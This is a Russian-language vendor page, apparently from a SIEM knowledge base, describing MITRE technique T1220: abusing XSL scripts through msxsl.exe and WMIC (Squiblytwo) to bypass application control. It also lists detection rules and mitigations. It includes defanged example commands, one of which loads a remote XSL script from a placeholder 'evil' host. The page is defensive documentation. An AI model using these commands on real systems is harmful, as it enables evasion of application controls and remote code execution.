MaxPatrol SIEM

Выявляет инциденты ИБ, ведущие к нарушению киберустойчивости компании

T1220: Использование сценариев XSL

Злоумышленники могут обходить системы контроля приложений и скрывать выполнение кода, внедряя сценарии в XSL-файлы. Файлы XSL (Extensible Stylesheet Language) обычно используются для описания обработки и отображения данных в XML-файлах. Для поддержки сложных операций стандарт XSL поддерживает встроенные сценарии, написанные на различных языках программирования .

Злоумышленники могут злоупотреблять этой функциональностью для выполнения произвольных файлов в обход систем контроля приложений. Как и в случае выполнения через доверенные утилиты разработчика, для выполнения вредоносного JavaScript-кода, встроенного в локальные и удаленные (доступные по URL) XSL-файлы, злоумышленники могут устанавливать и использовать утилиту командной строки Microsoft для преобразования файлов (msxsl.exe) . Поскольку утилита msxsl.exe по умолчанию не установлена, злоумышленнику, вероятно, придется доставлять ее вместе с другими вредоносными файлами . Msxsl.exe принимает два основных аргумента: исходный XML-файл и XSL-таблицу стилей. Поскольку XSL-файл также является и корректным XML-файлом, злоумышленник может указать один и тот же XSL-файл оба раза. Msxsl.exe также позволяет злоумышленникам присваивать XML- и XSL-файлам произвольные расширения.

Примеры команд.

  • msxsl.exe customers[.]xml script[.]xsl
  • msxsl.exe script[.]xsl script[.]xsl
  • msxsl.exe script[.]jpeg script[.]jpeg

Другой вариант этой техники, который называется Squiblytwo, заключается в использовании инструментария управления Windows для запуска сценария на языке JScript или VBScript внутри XSL-файла. Эта техника, так же как и использование утилиты Regsvr32 (техника Squiblydoo), выполняет локальные или удаленные сценарии посредством доверенного встроенного инструмента Windows. Злоумышленники могут воспользоваться любым псевдонимом в инструментарии управления Windows при помощи параметра /FORMAT.

Примеры команд:

  • для локального файла: wmic process list /FORMAT:evil[.]xsl
  • для удаленного файла: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”

Какие продукты Positive Technologies покрывают технику

Экспертиза MaxPatrol SIEM

mitre_attck_defense_evasion: PT-CR-208: XSL_Script_WMIC_Execution: Обнаружена попытка запустить сценарии XSL с помощью утилиты "wmic"
mitre_attck_defense_evasion: PT-CR-338: MSXSL_AWL_Bypass: Попытка обойти запрет на запуск приложений с помощью встроенной утилиты Microsoft Windows msxsl.exe (утилита командной строки для преобразования XSL)

Способы обнаружения

IDDS0011Источник и компонент данныхМодуль: Загрузка модуляОписание

Отслеживайте события, связанные с файлами DLL/PE, особенно события создания этих бинарных файлов, а также загрузки DLL в память процессов. Отслеживайте незнакомые DLL и те, которые обычно не загружаются в память процессов.

IDDS0009Источник и компонент данныхПроцесс: Создание процессаОписание

Отслеживайте процессы для мониторинга запуска msxsl.exe и wmic.exe и их аргументов . Анализ аргументов командной строки, использованных до и после вызова сценария, позволит определить происхождение и назначение загружаемой полезной нагрузки. Присутствие msxsl.exe или других утилит для разработки, отладки и реверс-инжиниринга, через которые может выполняться произвольный код, в системах, не предназначенных для этих целей, должно рассматриваться как подозрительное.

Меры противодействия

IDM1038НазваниеЗащита от выполненияОписание

Если msxsl.exe не нужен, заблокируйте его выполнение, чтобы предотвратить злоупотребления со стороны злоумышленников.